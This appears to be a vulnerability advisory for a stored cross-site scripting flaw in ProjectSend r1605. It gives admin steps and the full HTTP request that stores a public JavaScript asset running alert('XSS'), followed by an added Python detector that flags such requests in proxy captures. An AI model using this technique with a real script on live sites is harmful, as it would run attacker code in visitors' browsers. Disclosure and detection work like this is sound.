
ProjectSend r1605 - Stored XSS

HackApt-37 Team (verified member)

Exploit Title: ProjectSend r1605 - Stored XSS
Application: ProjectSend
Version: r1605
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & PoC
====================================================
1. Log in as admin
2. Go to Custom HTML/CSS/JS (http://localhost/custom-assets.php)
3. Go to New JS (http://localhost/custom-assets-add.php?language=js)
4. Set the content to alert("XSS"); and set it to public
5. Save
6. Go to http://localhost (logged out)

Payload: alert("xss")

POST /custom-assets-add.php HTTP/1.1
Host: localhost
Content-Length: 171
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/custom-assets-add.php?language=js
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: log_download_started=false; PHPSESSID=7J8G8U9T7KHB259CI4FVAREG2L
Connection: close

csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head
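
For defenders reviewing proxy or WAF captures, the following is an added example (not part of the original post and not ProjectSend code) that flags requests which store an enabled, public JS asset, using only the endpoint and form fields visible in the request above. The function names and sample requests are constructed for illustration, and it is an assumption that a disabled asset is submitted without the enabled field.

```python
from urllib.parse import parse_qs, urlsplit

ASSET_ENDPOINT = "/custom-assets-add.php"  # path taken from the request above


def parse_form_post(raw: str):
    """Split a raw HTTP request into (method, path, form-field dict)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    # Raises ValueError when the request line does not have three parts.
    method, target, _version = head.split("\n", 1)[0].split(" ", 2)
    fields = {k: v[-1] for k, v in parse_qs(body.strip(), keep_blank_values=True).items()}
    return method.upper(), urlsplit(target).path, fields


def flag_public_js_asset(raw: str):
    """Return a finding dict if the request stores an enabled, public JS asset, else None."""
    try:
        method, path, f = parse_form_post(raw)
    except ValueError:
        return None  # not a parseable request line
    if method != "POST" or path != ASSET_ENDPOINT:
        return None
    if f.get("language") != "js" or f.get("enabled") != "on" or f.get("location") != "public":
        return None
    # parse_qs has already percent-decoded the script body for the reviewer.
    return {"title": f.get("title", ""), "position": f.get("position", ""),
            "content": f.get("content", "")}


# Constructed samples: same shape as the request above, CSRF token replaced by a placeholder.
SAMPLE_PUBLIC_JS = (
    "POST /custom-assets-add.php HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "csrf_token=PLACEHOLDER&language=js&title=test"
    "&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head"
)
# Assumption: an asset saved as disabled omits the "enabled" field entirely.
SAMPLE_DISABLED = SAMPLE_PUBLIC_JS.replace("&enabled=on", "")

if __name__ == "__main__":
    for name, raw in (("public_js", SAMPLE_PUBLIC_JS), ("disabled", SAMPLE_DISABLED)):
        print(name, flag_public_js_asset(raw))
```

Each finding carries the decoded script content, so a reviewer can compare it against the assets administrators are expected to publish.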
 